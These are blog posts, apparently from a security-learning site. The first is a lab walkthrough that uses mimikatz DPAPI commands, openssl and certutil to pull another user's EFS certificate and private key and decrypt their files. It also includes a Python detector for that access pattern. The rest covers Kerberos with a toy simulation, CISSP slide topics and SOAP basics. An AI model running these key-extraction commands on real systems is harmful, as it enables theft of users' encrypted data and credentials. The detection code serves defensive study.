<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFQRRihb2Vn-4H4cga8omMJJObKZVj5rvtunFGtaunBFyJNNeGSaqgUDpXXHIP6tag_Fm2fOiyhK192ZHyRNsdb2vrOk7FTp_xURAuBXUmJ70prcRiuvYHOBgDEhTuIwi3PypkZMz0STU_/s1600/1_access+EFS+certificate+file+location+from+malicioususer.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFQRRihb2Vn-4H4cga8omMJJObKZVj5rvtunFGtaunBFyJNNeGSaqgUDpXXHIP6tag_Fm2fOiyhK192ZHyRNsdb2vrOk7FTp_xURAuBXUmJ70prcRiuvYHOBgDEhTuIwi3PypkZMz0STU_/s400/1_access+EFS+certificate+file+location+from+malicioususer.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Encrypted Private Key</td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD3by984XigD7uuqjFn894XcAdXR5TIbnScPa8S8Af-qM8zltHaFj7CEgbWNELlBwPFYPaA417LXfDyDjSEBRcFBYL9CFrbyv1vrFiKylPyBtg_ZGDJ78uM0U7iPkpPxybStaVYSjMezSA/s1600/2_confirming+if+private+key+is+correct.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD3by984XigD7uuqjFn894XcAdXR5TIbnScPa8S8Af-qM8zltHaFj7CEgbWNELlBwPFYPaA417LXfDyDjSEBRcFBYL9CFrbyv1vrFiKylPyBtg_ZGDJ78uM0U7iPkpPxybStaVYSjMezSA/s400/2_confirming+if+private+key+is+correct.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Confirming the private key </td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNLx1C3WhilMIyRaOfYh-qip1LfzsZDjhpRKAcVGvZb9CXSkJd2WJZoTBdIptdSzNyfwluWp6dZv8qB6KcuY22GGetmAX05PTAirf1Kj-i9nLCgmhbRgbWmKgzV3NWORLBowx7m6HLvdiN/s1600/3_Extracting_private+and+master+keys.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNLx1C3WhilMIyRaOfYh-qip1LfzsZDjhpRKAcVGvZb9CXSkJd2WJZoTBdIptdSzNyfwluWp6dZv8qB6KcuY22GGetmAX05PTAirf1Kj-i9nLCgmhbRgbWmKgzV3NWORLBowx7m6HLvdiN/s400/3_Extracting_private+and+master+keys.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Extracting Master Key</td></tr>
</tbody></table>
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5qmTNIFmdVQo4Jb7k9xO8rP6jntDEhSn9_h1pgCwc5WHKI7pfYq77sTFMwzDKHl2dVMYavVRN26JSV9oXFzZuS6jONkLoiRwgwGiizVo625Tq2_LB0r9XiMRiuLdl02S1esAZuAMd99qG/s1600/4_masterkey+decrypted+-+with+bruteforce.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5qmTNIFmdVQo4Jb7k9xO8rP6jntDEhSn9_h1pgCwc5WHKI7pfYq77sTFMwzDKHl2dVMYavVRN26JSV9oXFzZuS6jONkLoiRwgwGiizVo625Tq2_LB0r9XiMRiuLdl02S1esAZuAMd99qG/s400/4_masterkey+decrypted+-+with+bruteforce.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decrypted Master Key</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVJq2BON_78qC_Z4JDgwnjli6QTZxus_XwdQA2drF0HZZ98PQrmnvKUdy0vMWjWUmrmGBcxujKrXTJzM8_ZKCIq1642FWDT8-4g1_9WqidKeabon7IVFgSci5oIuM1Xb9kndajnXt-gt-b/s1600/5_extracting+private+key.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVJq2BON_78qC_Z4JDgwnjli6QTZxus_XwdQA2drF0HZZ98PQrmnvKUdy0vMWjWUmrmGBcxujKrXTJzM8_ZKCIq1642FWDT8-4g1_9WqidKeabon7IVFgSci5oIuM1Xb9kndajnXt-gt-b/s400/5_extracting+private+key.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decrypting Private key with master key</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivw4-SLFg5-ZDlmH7D9XXn6aMUmyNwWlMjuIJBqtT9AIhFzHzbkrp-dvChl1geJqalBMjncIKiDcZJ83apF5_RZ2xnTe8bGIzC1qE3QwDLUl8x5KpOGFVPVTcBX41-3lrgZscxd7djbfab/s1600/6_private+key+extracted+in+file.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivw4-SLFg5-ZDlmH7D9XXn6aMUmyNwWlMjuIJBqtT9AIhFzHzbkrp-dvChl1geJqalBMjncIKiDcZJ83apF5_RZ2xnTe8bGIzC1qE3QwDLUl8x5KpOGFVPVTcBX41-3lrgZscxd7djbfab/s400/6_private+key+extracted+in+file.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Export private key to .pvk file</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6O2WaSeYxAc-GOnaXfrS_q5wYdVD7lBhtiE-JX2SphBhYB6D4z75PO5lguUa_BAvMXDcCy0TEhPXr7hPoq76aPwPO3PXOARC31yS-7SjxxizXRcVrulSIHW8v7oOPdD4h8rFMfEk3yTBz/s1600/7_Certificate+Generation.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6O2WaSeYxAc-GOnaXfrS_q5wYdVD7lBhtiE-JX2SphBhYB6D4z75PO5lguUa_BAvMXDcCy0TEhPXr7hPoq76aPwPO3PXOARC31yS-7SjxxizXRcVrulSIHW8v7oOPdD4h8rFMfEk3yTBz/s400/7_Certificate+Generation.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Extracting Certificate</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmg33ZzmpaUcmqfDtaagsWGm4dByACUR1pDYwkCnluPdBNIoj5C2xShH7Q9cCQ5RpqnyKVeMACQP0p6Y6lJL9hfuwGn9YZ94RsURZ6CmA37Yif7orv_xP7R0eMX0eu-VofxWFns0Ps_w2w/s1600/7_certutil+-+import+pfx+and+open+confidential+file.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmg33ZzmpaUcmqfDtaagsWGm4dByACUR1pDYwkCnluPdBNIoj5C2xShH7Q9cCQ5RpqnyKVeMACQP0p6Y6lJL9hfuwGn9YZ94RsURZ6CmA37Yif7orv_xP7R0eMX0eu-VofxWFns0Ps_w2w/s400/7_certutil+-+import+pfx+and+open+confidential+file.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Importing Certificate and Decrypted EFS encrypted file</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u><br /></u></b>
<b><u>Path Details : (Reference : <a href="https://onedrive.live.com/view.aspx?resid=A352EBC5934F0254!3104&app=Excel">Link</a> )</u></b><br />
<br />
Public Key Path :<br />
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\D0180B88439A31CB850E1AAF6091B6006C0F2E9F<br />
<br />
O/P = D0180B88439A31CB850E1AAF6091B6006C0F2E9F.der<br />
<br />
Private Key Path :<br />
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3064908807-4107569833-3502535929-1000\5a4d2e06b944070e8dd6cffc489cf70e_e9e8e1d7-f64e-4e1f-879f-5d5a9f4fabe7<br />
<br />
O/P = b9fd6a85-6138-4a2b-98be-3acb31f7779b<br />
<br />
Path required to confirm the private key and get the master key:<br />
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-3064908807-4107569833-3502535929-1000<br />
<br />
O/P = {9d684db5-a8a9-4193-b364-5c270f321408}<br />
<br />
<br />
<br />
<b><u>All Required Keys :</u></b><br />
<br />
Public Key - D0180B88439A31CB850E1AAF6091B6006C0F2E9F.der<br />
<br />
Private Key - b9fd6a85-6138-4a2b-98be-3acb31f7779b<br />
<br />
Master Key - {9d684db5-a8a9-4193-b364-5c270f321408}<br />
<br />
<br />
<u><b>Key Extraction :</b></u><br />
<u>Extracting Public Keys : (Stored in .DER file )</u><br />
<br />
mimikatz # crypto::system /file:"C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\D0180B88439A31CB850E1AAF6091B6006C0F2E9F" /export<br />
<br />
<u>Extracting Private Keys :</u><br />
<br />
mimikatz # dpapi::capi /in:"C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3064908807-4107569833-3502535929-1000\5a4d2e06b944070e8dd6cffc489cf70e_e9e8e1d7-f64e-4e1f-879f-5d5a9f4fabe7"<br />
<u><br /></u>
<u>Extracting Master Keys :</u><br />
<br />
mimikatz # dpapi::masterkey /in:"C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-3064908807-4107569833-3502535929-1000\9d684db5-a8a9-4193-b364-5c270f321408"<br />
<br />
<u>Decrypt Master Keys : ( Password Required )</u><br />
<br />
mimikatz # dpapi::masterkey /in:"C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-3064908807-4107569833-3502535929-1000\9d684db5-a8a9-4193-b364-5c270f321408" /password:test@123<br />
<u><br /></u>
<u>Decrypt Private Keys : (Store in .pvk file)</u><br />
<br />
mimikatz # dpapi::capi /in:"C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3064908807-4107569833-3502535929-1000\5a4d2e06b944070e8dd6cffc489cf70e_e9e8e1d7-f64e-4e1f-879f-5d5a9f4fabe7" /masterkey:0f2d0b68ebd591f4feab3366a947672d0886dc6a<br />
<br />
<br />
<b><u>Building the PFX - This requires OpenSSL v 1.x</u></b><br />
<b><u><br /></u></b>
Download from : <a href="http://slproweb.com/download/Win32OpenSSL_Light-1_1_0c.exe">Link</a><br />
<br />
openssl x509 -inform DER -outform PEM -in C:\OpenSSL-Win32\D0180B88439A31CB850E1AAF6091B6006C0F2E9F.der -out C:\OpenSSL-Win32\public.pem<br />
<br />
openssl rsa -inform PVK -outform PEM -in C:\OpenSSL-Win32\raw_exchange_capi_0_b9fd6a85-6138-4a2b-98be-3acb31f7779b.pvk -out C:\OpenSSL-Win32\private.pem<br />
<br />
openssl pkcs12 -in C:\OpenSSL-Win32\public.pem -inkey C:\OpenSSL-Win32\private.pem -password pass:mimikatz -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\OpenSSL-Win32\cert.pfx<br />
<br />
<br />
<br />
<u><b>Importing Certificate :</b></u><br />
<br />
certutil -user -p mimikatz -importpfx cert.pfx NoChain,NoRoot<br />
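<br />
For defenders, the procedure above leaves a trace: one account reads files under another account's Protect\&lt;SID&gt; and Crypto\RSA\&lt;SID&gt; folders. The Python below is an added example (not part of the original post or of mimikatz) that flags this pattern in Windows Security event 4663 records. It assumes object-access auditing (a SACL) is enabled on those folders; the sample events, the second SID, the process names and the function names are constructed for illustration.<br />
<br />

```python
import re
from collections import defaultdict

# The two per-user key stores this page reads from. Both paths embed the
# owning account's SID, so the owner can be compared with the accessing SID.
KEY_STORE_RE = re.compile(
    r"\\Users\\[^\\]+\\AppData\\Roaming\\Microsoft\\"
    r"(?P<store>Protect|Crypto\\RSA)\\(?P<owner_sid>S-1-5-21(?:-\d+)+)(?:\\|$)",
    re.IGNORECASE,
)
FILE_READ_DATA = 0x1  # ReadData / ListDirectory bit of the 4663 AccessMask

ADMIN_SID = "S-1-5-21-3064908807-4107569833-3502535929-1000"  # SID shown on the page
OTHER_SID = "S-1-5-21-3064908807-4107569833-3502535929-1001"  # constructed
ROAMING = r"C:\Users\admin\AppData\Roaming\Microsoft"
MASTERKEY = "\\".join([ROAMING, "Protect", ADMIN_SID,
                       "9d684db5-a8a9-4193-b364-5c270f321408"])
RSA_KEY = "\\".join([ROAMING, "Crypto", "RSA", ADMIN_SID,
                     "5a4d2e06b944070e8dd6cffc489cf70e_e9e8e1d7-f64e-4e1f-879f-5d5a9f4fabe7"])

# Constructed sample records, shaped like parsed 4663 events.
SAMPLE_EVENTS = [
    # Owner touching their own master key: expected, not reported.
    {"EventID": 4663, "SubjectUserSid": ADMIN_SID, "SubjectUserName": "admin",
     "ObjectName": MASTERKEY, "AccessMask": "0x1",
     "ProcessName": r"C:\Windows\explorer.exe"},
    # Another account reading the owner's DPAPI master key.
    {"EventID": 4663, "SubjectUserSid": OTHER_SID, "SubjectUserName": "malicioususer",
     "ObjectName": MASTERKEY, "AccessMask": "0x1",
     "ProcessName": r"C:\Temp\tool.exe"},
    # The same account reading the owner's CAPI RSA private key.
    {"EventID": 4663, "SubjectUserSid": OTHER_SID, "SubjectUserName": "malicioususer",
     "ObjectName": RSA_KEY, "AccessMask": "0x1",
     "ProcessName": r"C:\Temp\tool.exe"},
    # Attribute read only (0x80) on the folder: no key material read, ignored.
    {"EventID": 4663, "SubjectUserSid": OTHER_SID, "SubjectUserName": "malicioususer",
     "ObjectName": "\\".join([ROAMING, "Protect", ADMIN_SID]), "AccessMask": "0x80",
     "ProcessName": r"C:\Windows\explorer.exe"},
    # Unrelated file: ignored.
    {"EventID": 4663, "SubjectUserSid": OTHER_SID, "SubjectUserName": "malicioususer",
     "ObjectName": r"C:\Users\admin\Documents\notes.txt", "AccessMask": "0x1",
     "ProcessName": r"C:\Windows\System32\notepad.exe"},
]


def find_cross_user_key_access(events, allowed_sids=frozenset()):
    """Return reads of a user's key store made by a different account.

    allowed_sids is a tuning knob (for example a backup agent's service
    account); what belongs in it is environment-specific.
    """
    findings = []
    for ev in events:
        if ev.get("EventID") != 4663:
            continue
        match = KEY_STORE_RE.search(ev.get("ObjectName", ""))
        if match is None:
            continue
        if not int(ev.get("AccessMask", "0x0"), 16) & FILE_READ_DATA:
            continue
        actor = ev.get("SubjectUserSid", "")
        owner = match.group("owner_sid").upper()
        if actor.upper() == owner or actor in allowed_sids:
            continue
        is_protect = match.group("store").lower() == "protect"
        findings.append({
            "actor_sid": actor,
            "actor": ev.get("SubjectUserName", ""),
            "owner_sid": owner,
            "store": "Protect" if is_protect else "Crypto\\RSA",
            "object": ev["ObjectName"],
            "process": ev.get("ProcessName", ""),
        })
    return findings


def summarize(findings):
    """Group by (actor, owner). Reading both the master key and the RSA key
    of the same victim is the combination the steps above need: rate it high."""
    stores = defaultdict(set)
    for f in findings:
        stores[(f["actor_sid"], f["owner_sid"])].add(f["store"])
    return [
        {"actor_sid": actor, "owner_sid": owner, "stores": sorted(seen),
         "severity": "high" if len(seen) == 2 else "medium"}
        for (actor, owner), seen in sorted(stores.items())
    ]


if __name__ == "__main__":
    for row in summarize(find_cross_user_key_access(SAMPLE_EVENTS)):
        print(row)
```
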
<br />
<br />
<br />
Reference: https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files<br />
<br />
I know it's already available, but I wanted to replicate it in my test environment!<br />
<br />
Hope this is helpful.<br />
<br />
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com2tag:blogger.com,1999:blog-6767655042968972948.post-12816177887957108682017-01-15T05:15:00.000-08:002017-01-28T04:55:36.389-08:00Quick Reference<div dir="ltr" style="text-align: left;" trbidi="on">
Hi All,<br />
<br />
Adding my updated quick reference slides on the following topics: <a href="https://drive.google.com/open?id=0B4fmHoqW8qjTSjIwSXhCXzVOSUk">Quick Reference v0.3</a><br />
<br />
<ol style="text-align: left;">
<li>Law systems</li>
<li>Intellectual Property Law (IPL)</li>
<li>International Issues</li>
<li>Safe Harbor</li>
<li>Wassenaar Arrangement</li>
<li>US Laws</li>
<li>Risk Analysis Types</li>
<li>Asset Types</li>
</ol>
<div>
<br /></div>
<div>
21-01-2017 </div>
<div>
New slides on the following topics:</div>
<div>
<ol style="text-align: left;">
<li>Information Classification</li>
<li>Data Management</li>
<li>Quality Assurance and Quality Control</li>
<li>Data Quality</li>
<li>International Standards</li>
<li>CISI</li>
<li>Degausser Devices</li>
<li>PGP - Pretty Good Privacy</li>
<li>TOGAF</li>
</ol>
</div>
<div>
<br />
28-01-2017<br />
<br />
<ol style="text-align: left;">
<li>Security models</li>
<li>Cryptography</li>
</ol>
</div>
<div>
<br /></div>
<div>
Hope these quick references will be helpful!</div>
<div>
<br /></div>
<div>
Do let me know in case it needs to be updated. Thanks</div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com1tag:blogger.com,1999:blog-6767655042968972948.post-12148442496383285602016-12-21T11:14:00.000-08:002017-01-16T21:41:48.139-08:00Kerberos Working<div dir="ltr" style="text-align: left;" trbidi="on">
<b><u><br /></u></b>
<b><u>Kerberos Understanding</u></b><br />
<br />
<br />
Kerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. A free implementation of this protocol is available from the Massachusetts Institute of Technology.<br />
<br />
<ol style="text-align: left;">
<li>The Kerberos protocol has 3 key components - <br />- Client [ Users / Applications ]<br />- Services <br />- Key Distribution Centre (KDC)</li>
<li>Key Distribution Centre (KDC) key components -<br />- Ticket Granting Service (TGS)<br />- KDC Database<br />- Authentication Service<br /><b><u><br />Note : </u></b> Users, applications and services are also known as <b>principals</b>. A set of principals is called a "<b>realm</b>".</li>
<li>Keys used in Kerberos authentication :<br />- <b>Secret Keys </b> : These keys are shared between the KDC and a principal<br />- <b>Session Keys </b> : These keys are shared between client and services, i.e. between principals</li>
</ol>
<div>
Overall Workflow - Client needs to access email service</div>
<ul style="text-align: left;">
<li>Kerberos is a single sign-on technology.</li>
<li>In Kerberos, the client sends its username to the KDC.</li>
<li>The KDC in turn searches for the user in the KDC database.</li>
<li>If the user is found in the KDC database, the TGS creates a ticket (the TGT) valid for a limited period of time and sends it to the client along with a session key.</li>
<li>Now, if the client wants to access the email server, it creates an "Authenticator" message containing the client name, IP address and time, and encrypts it with the session key (S1) provided by the KDC.</li>
<li>The client then sends the TGT, the authenticator encrypted with the session key, and the name of the service it needs to access (the mail service) to the KDC.</li>
<li>The KDC decrypts the message and, after confirmation, creates a "Service Ticket" and encrypts it with the service key.</li>
<li>The service ticket, along with a new session key (S2), is encrypted with S1 and sent to the client.</li>
<li>The client now has the service ticket; however, it can't decrypt it as it doesn't have the service key.</li>
<li>The client encrypts an authenticator with the new session key (S2) and sends it to the service (email service).</li>
<li>Once the service receives the message, it can decrypt it with the service key and confirm the identity.</li>
<li>The client can now communicate with the service!</li>
</ul>
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnt0ysgZhhoK_J6Lam671mB6BEGs7ZBtxvJWnFTkwbZIk_tGhQb6zRhqAC477jZJw_fqR5xyiRnZxvTOyPpWA35FNl1GX9QKgjmQt47T0kmbnPKyLzXIGkac2jntxiVsTjwqmuQEleEI5S/s1600/1.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnt0ysgZhhoK_J6Lam671mB6BEGs7ZBtxvJWnFTkwbZIk_tGhQb6zRhqAC477jZJw_fqR5xyiRnZxvTOyPpWA35FNl1GX9QKgjmQt47T0kmbnPKyLzXIGkac2jntxiVsTjwqmuQEleEI5S/s400/1.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Kerberos Key Components</td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq94W_HQq3cFQN5Cprsx2ShEJBNRJCwr_7wAeM1eiOanYnKxtYOEMxnKzCW-eWLiiWJxCzLZwkxRR7We23LDyaR9A00kbeB-QVUgTidBkTVllL87SymgBzUPcKOYhTih8AjfaIoxtfRM3z/s1600/2.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq94W_HQq3cFQN5Cprsx2ShEJBNRJCwr_7wAeM1eiOanYnKxtYOEMxnKzCW-eWLiiWJxCzLZwkxRR7We23LDyaR9A00kbeB-QVUgTidBkTVllL87SymgBzUPcKOYhTih8AjfaIoxtfRM3z/s400/2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Kerberos Overall Flow - Client wants to access email service</td></tr>
</tbody></table>
<br />
Below are some of the best links I came across for understanding Kerberos :<br />
<a href="https://www.youtube.com/watch?v=KD2Q-2ToloE">Link 1</a><br />
<a href="https://www.youtube.com/watch?v=kp5d8Yv3-0c&t=327s">Link 2</a><br />
<a href="https://www.blackhat.com/docs/us-15/materials/us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection-wp.pdf">Link 3 ( Blackhat )</a><br />
<br />
Potential weaknesses in Kerberos :<br />
<br />
<ol style="text-align: left;">
<li>The KDC can be a single point of failure</li>
<li>Secret keys are stored temporarily on users' workstations</li>
<li>Session keys reside either in a cache or in a key table</li>
<li>Kerberos is vulnerable to password guessing - the KDC doesn't have any mechanism to detect brute-force attempts.</li>
<li>Network traffic is not protected if encryption is not enabled</li>
<li>Keys that are too short are vulnerable to brute force</li>
<li>Kerberos needs all client and server clocks to be synchronised</li>
</ol>
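<br />
The workflow above and the clock requirement from the list of weaknesses, replayed as an added Python example (not code from the original post). <code>seal</code>/<code>unseal</code> are a toy stand-in for a real Kerberos encryption type, and the principal names, IP address, ticket lifetime and 300-second skew limit are assumptions made for the demonstration.<br />

```python
import hashlib, hmac, json, os

MAX_SKEW = 300   # tolerated clock difference in seconds (assumed; 5 min is the usual default)
LIFETIME = 600   # ticket lifetime in seconds (constructed value)

def _stream(key: bytes, nonce: bytes, n: int) -> bytes:
    blocks = (hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
              for i in range(n // 32 + 1))
    return b"".join(blocks)[:n]

def seal(key: bytes, obj: dict) -> bytes:
    """Toy encrypt-then-MAC; a stand-in for a real Kerberos encryption type."""
    plain = json.dumps(obj).encode()
    nonce = os.urandom(16)
    body = nonce + bytes(p ^ s for p, s in zip(plain, _stream(key, nonce, len(plain))))
    return body + hmac.new(key, body, hashlib.sha256).digest()

def unseal(key: bytes, blob: bytes) -> dict:
    body, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        raise ValueError("cannot decrypt: wrong key or modified message")
    nonce, ct = body[:16], body[16:]
    return json.loads(bytes(c ^ s for c, s in zip(ct, _stream(key, nonce, len(ct)))))

def check(ticket: dict, auth: dict, now: float) -> None:
    """Checks applied by both the KDC and the service to ticket + authenticator."""
    if now > ticket["exp"]:
        raise ValueError("ticket expired")
    if auth["client"] != ticket["client"]:
        raise ValueError("authenticator does not match ticket")
    if abs(now - auth["time"]) > MAX_SKEW:
        raise ValueError("clock skew too great")

class KDC:
    def __init__(self, secret_keys: dict):
        self.db = secret_keys           # KDC database: principal -> secret key
        self.kdc_key = os.urandom(32)   # known only to the KDC, protects TGTs

    def issue_tgt(self, user: str, now: float):
        if user not in self.db:
            raise KeyError("principal not in KDC database")
        s1 = os.urandom(32).hex()
        tgt = seal(self.kdc_key, {"client": user, "key": s1, "exp": now + LIFETIME})
        # S1 travels under the user's secret key, so only that user can use the TGT
        return tgt, seal(self.db[user], {"key": s1})

    def issue_service_ticket(self, tgt: bytes, auth: bytes, service: str, now: float):
        t = unseal(self.kdc_key, tgt)
        s1 = bytes.fromhex(t["key"])
        check(t, unseal(s1, auth), now)
        s2 = os.urandom(32).hex()
        ticket = seal(self.db[service],
                      {"client": t["client"], "key": s2, "exp": now + LIFETIME})
        # service ticket and new session key S2 go back encrypted with S1
        return seal(s1, {"ticket": ticket.hex(), "key": s2})

def service_accept(service_key: bytes, ticket: bytes, auth: bytes, now: float) -> str:
    t = unseal(service_key, ticket)     # only the service key opens the ticket
    check(t, unseal(bytes.fromhex(t["key"]), auth), now)
    return t["client"]

def _opens(key: bytes, blob: bytes) -> bool:
    try:
        unseal(key, blob)
        return True
    except ValueError:
        return False

def run_exchange(client_clock_offset: float = 0.0):
    """Return (identity confirmed by the service, service ticket opaque to client)."""
    now = 1_700_000_000.0               # fixed KDC/service clock for a repeatable run
    client_now = now + client_clock_offset
    alice_key, mail_key = os.urandom(32), os.urandom(32)
    kdc = KDC({"alice": alice_key, "mail": mail_key})

    tgt, sealed_s1 = kdc.issue_tgt("alice", now)
    s1 = bytes.fromhex(unseal(alice_key, sealed_s1)["key"])
    auth1 = seal(s1, {"client": "alice", "ip": "192.0.2.10", "time": client_now})
    reply = unseal(s1, kdc.issue_service_ticket(tgt, auth1, "mail", now))
    ticket, s2 = bytes.fromhex(reply["ticket"]), bytes.fromhex(reply["key"])

    # The client holds its secret key, S1 and S2, none of which opens the ticket
    opaque = not any(_opens(k, ticket) for k in (alice_key, s1, s2))

    auth2 = seal(s2, {"client": "alice", "ip": "192.0.2.10", "time": client_now})
    return service_accept(mail_key, ticket, auth2, now), opaque

if __name__ == "__main__":
    print(run_exchange())               # clocks in sync
    try:
        run_exchange(900)               # client clock 15 minutes ahead
    except ValueError as err:
        print("rejected:", err)
```
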
<br />
<br />
<br />
Hope this helps! Thanks for visiting!<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-31197196493261256812016-11-16T11:12:00.002-08:002017-01-16T21:42:14.178-08:00SOAP (Simple Object Access Protocol ) - Understanding<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
SOAP - Simple Object Access Protocol<br />
<br />
<br />
<ol style="text-align: left;">
<li>Consider a scenario where Application A needs to communicate with Application B</li>
<li>Application A needs to get the status of a credit card from Application B</li>
<li>In this case, a web service will be created on Application B</li>
<li>Irrespective of the underlying technology, Application A will be able to send SOAP requests containing the credit card no. to the Application B web service.</li>
<li>The Application B web service will process the request and generate a SOAP response, which will be sent to Application A</li>
</ol>
<div>
<br /></div>
<div>
Refer to the diagram below:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
